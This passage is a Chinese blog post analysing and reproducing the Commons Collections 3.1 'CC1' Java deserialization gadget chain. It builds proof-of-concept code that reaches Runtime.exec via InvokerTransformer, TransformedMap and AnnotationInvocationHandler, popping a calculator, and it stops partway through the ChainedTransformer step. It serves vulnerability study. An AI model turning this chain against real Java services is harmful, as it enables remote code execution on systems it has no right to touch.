<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Lobster Two:300,300italic,400,400italic,700,700italic|Roboto Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Java,">










<meta name="description" content="Apache Commons CollectionsApache Commons Collections是一个扩展了Java标准库里的Collection结构的第三方基础库，它提供了很多强有力的数据结构类型并且实现了各种集合工具类。作为Apache开源项目的重要组件，Commons Collections被广泛应用于各种Java应用的开发。其实Java JDK已经提供了丰富的集合操作，但是在某些场">
<meta name="keywords" content="Java">
<meta property="og:type" content="article">
<meta property="og:title" content="Java CC1链复现与分析">
<meta property="og:url" content="elssm.github.io/2021/10/27/Java-CC1链复现与分析/index.html">
<meta property="og:site_name" content="ELSSM">
<meta property="og:description" content="Apache Commons CollectionsApache Commons Collections是一个扩展了Java标准库里的Collection结构的第三方基础库，它提供了很多强有力的数据结构类型并且实现了各种集合工具类。作为Apache开源项目的重要组件，Commons Collections被广泛应用于各种Java应用的开发。其实Java JDK已经提供了丰富的集合操作，但是在某些场">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/23.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/1.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/2.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/3.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/4.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/5.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/6.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/7.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/8.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/9.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/10.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/24.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/11.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/12.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/13.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/14.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/15.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/16.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/17.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/18.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/20.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/19.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/21.png">
<meta property="og:image" content="/2021/10/27/Java-CC1链复现与分析/22.png">
<meta property="og:updated_time" content="2021-10-30T08:44:26.535Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Java CC1链复现与分析">
<meta name="twitter:description" content="Apache Commons CollectionsApache Commons Collections是一个扩展了Java标准库里的Collection结构的第三方基础库，它提供了很多强有力的数据结构类型并且实现了各种集合工具类。作为Apache开源项目的重要组件，Commons Collections被广泛应用于各种Java应用的开发。其实Java JDK已经提供了丰富的集合操作，但是在某些场">
<meta name="twitter:image" content="/2021/10/27/Java-CC1链复现与分析/23.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="elssm.github.io/2021/10/27/Java-CC1链复现与分析/">





  <title>Java CC1链复现与分析 | ELSSM</title><!-- hexo-inject:begin --><!-- hexo-inject:end -->
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ELSSM</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="elssm.github.io/2021/10/27/Java-CC1链复现与分析/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="elssm">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/author1.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ELSSM">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Java CC1链复现与分析</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2021-10-27T22:20:34+08:00">
                2021-10-27
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h4 id="Apache-Commons-Collections"><a href="#Apache-Commons-Collections" class="headerlink" title="Apache Commons Collections"></a>Apache Commons Collections</h4><p>Apache Commons Collections是一个扩展了Java标准库里的Collection结构的第三方基础库，它提供了很多强有力的数据结构类型并且实现了各种集合工具类。作为Apache开源项目的重要组件，Commons Collections被广泛应用于各种Java应用的开发。其实Java JDK已经提供了丰富的集合操作，但是在某些场合下，可能无法满足，apache commons组件提供了更加丰富的集数据结构。</p>
<h4 id="复现环境"><a href="#复现环境" class="headerlink" title="复现环境"></a>复现环境</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Mac OS Big Sur</span><br><span class="line">JDK-7u6</span><br><span class="line">commons-collections3.1</span><br></pre></td></tr></table></figure>
<p>JDK7下载地址：<a href="https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html" target="_blank" rel="noopener">https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html</a></p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/23.png" alt="23"></p>
<p>下载好之后查看本地JDK版本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">caoyifan@MacBookPro ~ % ls /Library/Java/JavaVirtualMachines </span><br><span class="line">jdk1.7.0_06.jdk		jdk1.8.0_191.jdk</span><br></pre></td></tr></table></figure>
<h5 id="IDEA配置"><a href="#IDEA配置" class="headerlink" title="IDEA配置"></a>IDEA配置</h5><p>创建好Maven项目之后，指定对应的JDK版本即可</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/1.png" alt="1"></p>
<p>Common Collections3.1通过maven添加</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependencies</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>commons-collections<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>commons-collections<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">version</span>&gt;</span>3.1<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependencies</span>&gt;</span></span><br></pre></td></tr></table></figure>
<h4 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h4><h5 id="一个简单反射例子"><a href="#一个简单反射例子" class="headerlink" title="一个简单反射例子"></a>一个简单反射例子</h5><p>在分析该漏洞之前我们先写一个利用反射弹计算器的例子。后面的漏洞分析会基于这个例子进行修改。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.lang.reflect.Method;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">ccTest</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        Runtime r = Runtime.getRuntime();</span><br><span class="line">        Class c = Runtime<span class="class">.<span class="keyword">class</span></span>;</span><br><span class="line">        Method m = c.getMethod(<span class="string">"exec"</span>, String<span class="class">.<span class="keyword">class</span>)</span>;</span><br><span class="line">        m.invoke(r,<span class="string">"open -a calculator"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h5 id="从Trnsformer看起"><a href="#从Trnsformer看起" class="headerlink" title="从Trnsformer看起"></a>从Trnsformer看起</h5><p>我们知道该漏洞的问题出现在Transformer接口类，因此我们首先查看一下实现这个类都有哪些方法。</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/2.png" alt="2"></p>
<p>这个时候我们随便点进去一个方法看看具体是怎么实现的。例如在<code>ConstantTransformer</code>类返回的是一个常量。在<code>InvokerTransformer</code>类中实现的是一个反射调用，而且参数都是可控的。因此我们尝试利用<code>InvokerTransformer</code>来改写上面的反射的例子。</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/3.png" alt="3"></p>
<h5 id="InvokerTransformer"><a href="#InvokerTransformer" class="headerlink" title="InvokerTransformer"></a>InvokerTransformer</h5><p>在<code>InvokerTransformer</code>类中存在三个参数是我们可控的，因此我们只需要按照transform方法中的调用方式传值就可以了。改写后的代码如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Method;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">ccTest</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        Runtime r = Runtime.getRuntime();</span><br><span class="line">        new InvokerTransformer("exec",new Class[]&#123;String.class&#125;,new Object[]&#123;"open -a calculator"&#125;).transform(r);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这个时候我们已经找到了一个点，是<code>InvokerTransformer.transform</code>这个方法，它是一个危险方法，接着我们向上继续找还有哪些调用了<code>transform</code>方法，最好是不同名的</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/4.png" alt="4"></p>
<h5 id="TransformedMap"><a href="#TransformedMap" class="headerlink" title="TransformedMap"></a>TransformedMap</h5><p>注意到<code>TransformedMap</code>这个类，因为在这个类中有好几处都调用了<code>transform</code>这个方法。</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/5.png" alt="5"></p>
<p>跟进<code>checkSetValue</code>方法， 发现调用了<code>valueTransformer</code>的<code>transform</code>方法</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/6.png" alt="6"></p>
<p>找到<code>TransformedMap</code>的构造函数，发现传入了一个<code>map</code>和两个<code>Transformer</code>，可以理解为接受一个<code>map</code>并对这个<code>map</code>的<code>key</code>和<code>value</code>做一些操作，因为这是一个保护方法， 我们继续找一下在哪里调用了这个方法。</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/7.png" alt="7"></p>
<p>在构造方法上面找到了<code>decorate</code>静态方法</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/8.png" alt="8"></p>
<p>接着我们向上查找哪些调用了<code>checkSetValue</code>方法，发现只有一处调用了该方法，继续跟进</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/9.png" alt="9"></p>
<p>发现是<code>AbstractInputCheckedMapDecorator</code>类中有一个<code>MapEntry</code>类，这个类调用了<code>setValue</code>方法</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/10.png" alt="10"></p>
<h5 id="MapEntry"><a href="#MapEntry" class="headerlink" title="MapEntry"></a>MapEntry</h5><p>这个时候我们梳理一遍，当我们遍历被修饰的<code>Map</code>的时候，就会走到<code>setValue</code>这个方法，从而会调用<code>checkSetValue</code>，接着调用到了<code>valueTransformer.transform</code>方法，之后就会走到<code>InvokerTransformer.transform</code>方法执行</p>
<p>我们再次尝试改写上面的例子，首先实例化一个<code>map</code>对象，并对<code>map</code>进行装饰，因为在后面执行<code>transform</code>方法的是<code>decorate</code>方法传入的第三个参数，因此我们可以给第二个参数传一个空值，之后通过<code>for</code>循环调用<code>setValue</code>方法将我们的<code>Runtime.getRuntime()</code>对象传入。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Method;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">ccTest</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        Runtime r = Runtime.getRuntime();</span><br><span class="line">        InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class[]&#123;String.class&#125;,new Object[]&#123;"open -a calculator"&#125;);</span><br><span class="line">        HashMap&lt;Object,Object&gt; map = <span class="keyword">new</span> HashMap&lt;&gt;();</span><br><span class="line">        map.put(<span class="string">"key"</span>,<span class="string">"value"</span>);</span><br><span class="line">        Map&lt;Object,Object&gt; transformedMap = TransformedMap.decorate(map,<span class="keyword">null</span>,invokerTransformer);</span><br><span class="line">        <span class="keyword">for</span>(Map.Entry entry:transformedMap.entrySet())&#123;</span><br><span class="line">            entry.setValue(r);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h5 id="jdk源码关联"><a href="#jdk源码关联" class="headerlink" title="jdk源码关联"></a>jdk源码关联</h5><p>这个时候我们继续向上寻找调用链，看哪些类调用了<code>setValue</code>方法，按照流程，我应该能找到在<code>AnnotationInvocationHandler</code>这个类的<code>readObject</code>方法里面调用了<code>setValue</code>方法，可是找了一圈，并没有。。。我以为是我jdk版本的问题，于是在jdk下面查看，路径是<code>rt.jar</code>下面的<code>sun.reflect.annotation</code>，发现这个类不是源代码，所以查找调用的时候不会出现。</p>
<p>对于这个问题我找到了一个相对合理的解答：因为sun包是hotspot虚拟机中java.<em> 和javax.</em>的底层实现。因为包含在rt中，所以我们也可以调用。但是因为不是sun对外公开承诺的接口，所以根据实现的需要随时增减，因此在不同版本的hotspot中可能是不同的，而且在其他的jdk实现中是没有的，调用这些类，可能不会向后兼容，所以一般不推荐使用。因此如果我们需要查看<code>rt.jar</code>包下的源码就需要进行源码关联。</p>
<p>JDK-7u6源代码地址：<a href="http://jdk7src.sourceforge.net" target="_blank" rel="noopener">http://jdk7src.sourceforge.net</a></p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/24.png" alt="24"></p>
<p>下载好对应JDK版本之后，在IDEA中就可以设置。进入<code>File-&gt;Project Structrue-&gt;SDKs-&gt;Sourcepath</code>中添加即可</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/11.png" alt="11"></p>
<p>这个时候我们再次查看<code>AnnotationInvocationHandler</code>这个类，发现已经是源代码文件了，同样也在<code>setValue</code>放的的调用类中成功找到了这个类</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/12.png" alt="12"></p>
<h5 id="AnnotationInvocationHandler"><a href="#AnnotationInvocationHandler" class="headerlink" title="AnnotationInvocationHandler"></a>AnnotationInvocationHandler</h5><p>现在我们可以继续修改我们上面写的例子，将<code>AnnotationInvocationHandler</code>类加进去，尝试实例化这个类，但是由于该类不是<code>public</code>的，不能直接在外部调用，因此需要用到反射去获取。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Method;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">ccTest</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        Runtime r = Runtime.getRuntime();</span><br><span class="line"></span><br><span class="line">        InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class[]&#123;String.class&#125;,new Object[]&#123;"open -a calculator"&#125;);</span><br><span class="line">        HashMap&lt;Object,Object&gt; map = <span class="keyword">new</span> HashMap&lt;&gt;();</span><br><span class="line">        map.put(<span class="string">"key"</span>,<span class="string">"value"</span>);</span><br><span class="line">        Map&lt;Object,Object&gt; transformedMap = TransformedMap.decorate(map,<span class="keyword">null</span>,invokerTransformer);</span><br><span class="line"></span><br><span class="line">        Class c = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>);</span><br><span class="line">        Constructor annotationInvocationHandler = c.getDeclaredConstructor(Class<span class="class">.<span class="keyword">class</span>,<span class="title">Map</span>.<span class="title">class</span>)</span>;</span><br><span class="line">        annotationInvocationHandler.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">        Object o = annotationInvocationHandler.newInstance(Override<span class="class">.<span class="keyword">class</span>,<span class="title">transformedMap</span>)</span>;</span><br><span class="line"></span><br><span class="line">        serialize(o);</span><br><span class="line">        unserialize(<span class="string">"ser.bin"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">serialize</span><span class="params">(Object obj)</span> <span class="keyword">throws</span> IOException </span>&#123;</span><br><span class="line">        ObjectOutputStream oos = <span class="keyword">new</span> ObjectOutputStream(<span class="keyword">new</span> FileOutputStream(<span class="string">"ser.bin"</span>));</span><br><span class="line">        oos.writeObject(obj);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title">unserialize</span><span class="params">(String  Filename)</span> <span class="keyword">throws</span> IOException,ClassNotFoundException</span>&#123;</span><br><span class="line">        ObjectInputStream ois = <span class="keyword">new</span> ObjectInputStream(<span class="keyword">new</span> FileInputStream(Filename));</span><br><span class="line">        Object obj = ois.readObject();</span><br><span class="line">        <span class="keyword">return</span> obj;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h5 id="遇到的三个问题"><a href="#遇到的三个问题" class="headerlink" title="遇到的三个问题"></a>遇到的三个问题</h5><p>这里就会遇到三个问题，第一个问题是<code>setValue</code>，在上面的例子中我们<code>setValue</code>的值直接传入的是一个<code>Runtime</code>对象，但是在<code>AnnotationInvocationHandler</code>类中，这个传入的值并不是我们可控的。</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/13.png" alt="13"></p>
<p>第二个问题是对于<code>Runtime</code>类，它并不是可序列化的，因为它没有继承<code>Serializable</code>接口，因此我们也需要通过反射来实现。</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/14.png" alt="14"></p>
<p>第三个问题是进入<code>AnnotationInvocationHandler</code>类的<code>readObject</code>方法中的<code>setValue</code>方法需要满足两个if条件。</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/15.png" alt="15"></p>
<h5 id="反射调用Runtime"><a href="#反射调用Runtime" class="headerlink" title="反射调用Runtime"></a>反射调用Runtime</h5><p>我们先解决第二个问题，将<code>Runtime</code>对象通过反射实现。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.lang.reflect.Method;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">RuntimeReflect</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        Class c = Runtime<span class="class">.<span class="keyword">class</span></span>; <span class="comment">//通过反射获取到字节码对象</span></span><br><span class="line">        Method getRuntimeMethod = c.getMethod(<span class="string">"getRuntime"</span>, <span class="keyword">null</span>); <span class="comment">//获取getRuntime静态方法</span></span><br><span class="line">        Runtime r = (Runtime) getRuntimeMethod.invoke(<span class="keyword">null</span>, <span class="keyword">null</span>); <span class="comment">//获取Runtime对象</span></span><br><span class="line">        Method execMethod = c.getMethod(<span class="string">"exec"</span>, String<span class="class">.<span class="keyword">class</span>)</span>; <span class="comment">//反射调用exec方法</span></span><br><span class="line">        execMethod.invoke(r,<span class="string">"open -a calculator"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>接着我们把这个反射调用改成<code>InvokerTransformer</code>的形式</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Method;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">RuntimeReflect</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line"></span><br><span class="line">        Method getRuntimeMethod = (Method) new InvokerTransformer("getMethod",new Class[]&#123;String.class,Class[].class&#125;,new Object[]&#123;"getRuntime",null&#125;).transform(Runtime.class);</span><br><span class="line">        Runtime r = (Runtime) new InvokerTransformer("invoke",new Class[]&#123;Object.class,Object[].class&#125;,new Object[]&#123;null, null&#125;).transform(getRuntimeMethod);</span><br><span class="line">        new InvokerTransformer("exec",new Class[]&#123;String.class&#125;,new Object[]&#123;"open -a calculator"&#125;).transform(r);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h5 id="ChainedTransformer"><a href="#ChainedTransformer" class="headerlink" title="ChainedTransformer"></a>ChainedTransformer</h5><p>我们可以发现，实际上是对<code>InvokerTransformer</code>类的<code>transform</code>方法连续调用了三次，不由想到在之前的<code>Transformer</code>的实现类中有一个<code>ChainedTransformer</code>，在它的<code>transform</code>方法中就是一个循环调用的形式。</p>
<p><img src="/2021/10/27/Java-CC1链复现与分析/16.png" alt="16"></p>
<p>因此我们尝试使用<code>ChainedTransformer</code>类调用</p>
